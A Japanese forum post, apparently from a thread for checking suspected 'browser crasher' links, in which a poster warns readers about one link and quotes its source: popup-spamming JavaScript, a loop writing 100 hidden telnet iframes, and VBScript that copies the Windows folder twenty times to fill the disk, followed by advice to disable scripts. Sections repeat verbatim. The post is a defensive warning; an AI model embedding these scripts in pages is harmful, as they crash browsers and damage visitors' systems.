ブラクラかもしれなくて踏めない人たち その28
|
|
|
>>253
危険!!
Windows Vista で確認のところ、「人の検索」ダイアログボックスが連続で表示。
URL転送サービスを利用した、音付き画像を大量にポップアップ
また、こちらでは確認できなかったが、ソースからみて、C:\Program Files\ に、1〜20 のフォルダを作成させる。
その後、C:\Windows\ ないのすべてのフォルダ内容を、各C:\Program Files\ に作成した番号のファイルへ、コピーさせようとする。
その他にも、インラインフレームを利用した、TELNET接続、LDAP接続、FTP接続などを行う。
とても危険なので回避を推奨。
ソースで確認されたもの↓
〜ポップアップ〜
<SCRIPT LANGUAGE="JavaScript">
function Window(){
window.open("http://eroeroworld.zz.tc/yoro0001");
window.open("http://eroeroworld.zz.tc/yoro0002");
・・・(中略)
window.open("http://eroeroworld.zz.tc/yoro0015");
window.open("http://eroeroworld.zz.tc/yoro0016");
}
〜インラインフレーム〜
<!--
for (i=0; i<100; ++i) {
document.write('<iframe src="telnet://www.yahoo.co.jp:8080" width="1" height="1"></iframe>');
}
//-->
など。
危険!!
Windows Vista で確認のところ、「人の検索」ダイアログボックスが連続で表示。
URL転送サービスを利用した、音付き画像を大量にポップアップ
また、こちらでは確認できなかったが、ソースからみて、C:\Program Files\ に、1〜20 のフォルダを作成させる。
その後、C:\Windows\ ないのすべてのフォルダ内容を、各C:\Program Files\ に作成した番号のファイルへ、コピーさせようとする。
その他にも、インラインフレームを利用した、TELNET接続、LDAP接続、FTP接続などを行う。
とても危険なので回避を推奨。
ソースで確認されたもの↓
〜ポップアップ〜
<SCRIPT LANGUAGE="JavaScript">
function Window(){
window.open("http://eroeroworld.zz.tc/yoro0001");
window.open("http://eroeroworld.zz.tc/yoro0002");
・・・(中略)
window.open("http://eroeroworld.zz.tc/yoro0015");
window.open("http://eroeroworld.zz.tc/yoro0016");
}
〜インラインフレーム〜
<!--
for (i=0; i<100; ++i) {
document.write('<iframe src="telnet://www.yahoo.co.jp:8080" width="1" height="1"></iframe>');
}
//-->
など。
〜フォルダ作成、並びにコピー〜
<script language=VBSCRIPT>
Dim FSO
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CreateFolder "C:\Program Files\1"
FSO.CopyFolder "C:\WINDOWS", "C:\Program Files\1\"
FSO.CreateFolder "C:\Program Files\2"
FSO.CopyFolder "C:\WINDOWS", "C:\Program Files\2\"
・・・(中略)
FSO.CreateFolder "C:\Program Files\20"
FSO.CopyFolder "C:\WINDOWS", "C:\Program Files\20\"
Set FSO = Nothing
</script>
危険なので、アクセスは回避を強く推奨します。
なんらかのウイルスの可能性もありえるので、十分注意してください。
by ソース職人
<script language=VBSCRIPT>
Dim FSO
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CreateFolder "C:\Program Files\1"
FSO.CopyFolder "C:\WINDOWS", "C:\Program Files\1\"
FSO.CreateFolder "C:\Program Files\2"
FSO.CopyFolder "C:\WINDOWS", "C:\Program Files\2\"
・・・(中略)
FSO.CreateFolder "C:\Program Files\20"
FSO.CopyFolder "C:\WINDOWS", "C:\Program Files\20\"
Set FSO = Nothing
</script>
危険なので、アクセスは回避を強く推奨します。
なんらかのウイルスの可能性もありえるので、十分注意してください。
by ソース職人
追記:
「人の検索」ダイアログボックスは、閉じるボタンを押し続ければ、消すことが可能。
【ブラクラ防止方法】
・スクリプトの使用を禁止する。
・JavaScript の使用を禁止する。
これでまぁ防げると思われます。
今回確認したブラウザは、Safari 4 です。
ほかのブラウザでは、なんらか別の現象が発生する可能性が十分にあります。
by ソース職人
「人の検索」ダイアログボックスは、閉じるボタンを押し続ければ、消すことが可能。
【ブラクラ防止方法】
・スクリプトの使用を禁止する。
・JavaScript の使用を禁止する。
これでまぁ防げると思われます。
今回確認したブラウザは、Safari 4 です。
ほかのブラウザでは、なんらか別の現象が発生する可能性が十分にあります。
by ソース職人